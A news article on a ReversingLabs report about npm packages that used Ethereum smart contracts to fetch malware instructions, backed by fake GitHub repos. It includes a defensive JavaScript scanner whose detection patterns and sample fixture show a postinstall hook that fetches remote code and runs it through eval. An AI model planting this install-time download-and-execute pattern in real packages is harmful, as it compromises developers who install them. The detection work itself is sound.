A new tactic in software supply chain attacks
Hackers are using Ethereum smart contracts to conceal malware within code libraries, according to a new report by cybersecurity firm ReversingLabs. The campaign, which targeted npm packages, represents a new type of software supply chain attack that exploits open-source ecosystems to spread malicious code.
How the malware works
Researchers discovered that two npm packages, “colortoolsv2” and its clone “mimelib2”, used smart contracts to fetch command-and-control (C2) instructions. Instead of embedding malicious links directly into the code, the packages executed an obfuscated script that queried an Ethereum contract to locate a second-stage downloader.
By hosting payload instructions on-chain, hackers made detection and takedown much harder, creating a new evasion technique not previously seen in open-source attacks.
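One defensive check a maintainer or CI pipeline can run, as an added example that is not code from the report or from the packages it describes: a static triage of an npm package that looks for the combination the article outlines, an Ethereum contract lookup sitting next to a download-and-execute primitive, reachable from an install hook. The indicator list, thresholds, and the two sample packages are constructed for the demo.

```javascript
// Added example (not from the ReversingLabs report): heuristic triage of an npm
// package for the on-chain C2 lookup pattern. Indicator names and the
// verdict thresholds are assumptions for this demo, not a published ruleset.
const INDICATORS = [
  { cat: 'chain', name: 'json-rpc eth_call', re: /["']eth_call["']/ },
  { cat: 'chain', name: 'ethereum client library', re: /require\(["'](ethers|web3)["']\)/ },
  { cat: 'chain', name: '20-byte address literal', re: /0x[0-9a-fA-F]{40}\b/ },
  { cat: 'exec', name: 'dynamic code evaluation', re: /\b(eval|new Function)\s*\(/ },
  { cat: 'exec', name: 'child_process usage', re: /child_process/ },
  { cat: 'exec', name: 'outbound HTTP fetch', re: /\b(fetch|https?\.get|axios)\s*\(/ },
];

// Lifecycle hooks run automatically on `npm install`, so code reachable from
// them deserves the closest look.
function lifecycleHooks(pkgJson) {
  const scripts = pkgJson.scripts || {};
  return ['preinstall', 'install', 'postinstall'].filter((h) => h in scripts);
}

// files: { relativePath: sourceText }. Returns a verdict plus the evidence behind it.
function scanPackage(files) {
  const pkg = JSON.parse(files['package.json'] || '{}');
  const hooks = lifecycleHooks(pkg);
  const hits = [];
  for (const [path, src] of Object.entries(files)) {
    if (!path.endsWith('.js')) continue;
    for (const ind of INDICATORS) {
      if (ind.re.test(src)) hits.push({ path, cat: ind.cat, name: ind.name });
    }
  }
  const chain = hits.some((h) => h.cat === 'chain');
  const exec = hits.some((h) => h.cat === 'exec');
  // A chain lookup next to an execution primitive is the combination worth
  // escalating; an install hook on top of it means it fires without user action.
  let verdict = 'clean';
  if (chain && exec) verdict = hooks.length ? 'high' : 'medium';
  else if (chain || exec || hooks.length) verdict = 'low';
  return { verdict, hooks, hits };
}

// Constructed sample packages for the demo (not the real colortoolsv2 / mimelib2 code).
const SUSPICIOUS_PACKAGE = {
  'package.json': JSON.stringify({ name: 'demo-colortools', scripts: { postinstall: 'node setup.js' } }),
  'setup.js': [
    "const https = require('https');",
    "const rpc = {jsonrpc:'2.0',method:'eth_call',params:[{to:'0x0000000000000000000000000000000000000000',data:'0x'},'latest'],id:1};",
    '// decode the returned hex into a URL (placeholder), then fetch and run it',
    "https.get(url, (r) => { let s = ''; r.on('data', (d) => (s += d)); r.on('end', () => eval(s)); });",
  ].join('\n'),
};
const BENIGN_PACKAGE = {
  'package.json': JSON.stringify({ name: 'demo-colors' }),
  'index.js': "module.exports.hex = (r, g, b) => '#' + [r, g, b].map((x) => x.toString(16).padStart(2, '0')).join('');",
};

console.log(scanPackage(SUSPICIOUS_PACKAGE).verdict, scanPackage(BENIGN_PACKAGE).verdict); // high clean
```

Regex indicators are a triage aid, not proof; a "high" verdict is a prompt to read the flagged file, and obfuscated samples may need dynamic analysis in a sandbox to surface the same behaviour.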
Fake GitHub repos fuel the operation
The attackers also relied on crypto-themed GitHub repositories to boost credibility. These repositories featured inflated stars, automated commits, and fake maintainers to lure developers into adding the compromised packages as dependencies.
ReversingLabs noted that some repos posed as trading bots and crypto tools, such as “solana-trading-bot-v2,” giving the illusion of legitimacy with thousands of superficial commits and manipulated activity.
Campaign linked to wider open-source threats
While the malicious packages have been taken down after being reported to npm maintainers, researchers believe they were part of a much larger campaign spreading across both npm and GitHub. Previous campaigns flagged by ReversingLabs this year also abused developer trust by injecting malicious npm dependencies into widely used code libraries.
The bigger picture: evolving cyber threats
Lucija Valentic, a researcher at ReversingLabs, emphasized that this tactic shows how quickly cybercriminals are adapting to bypass detection. “These latest attacks demonstrate that efforts to implant malicious code in legitimate applications, steal data, and compromise digital assets are growing more sophisticated,” she said.
The report warns that open-source security risks are evolving, with blockchain technology now being used as part of advanced malware distribution strategies. Developers and organizations are urged to remain vigilant against attempts to infiltrate their projects with compromised dependencies.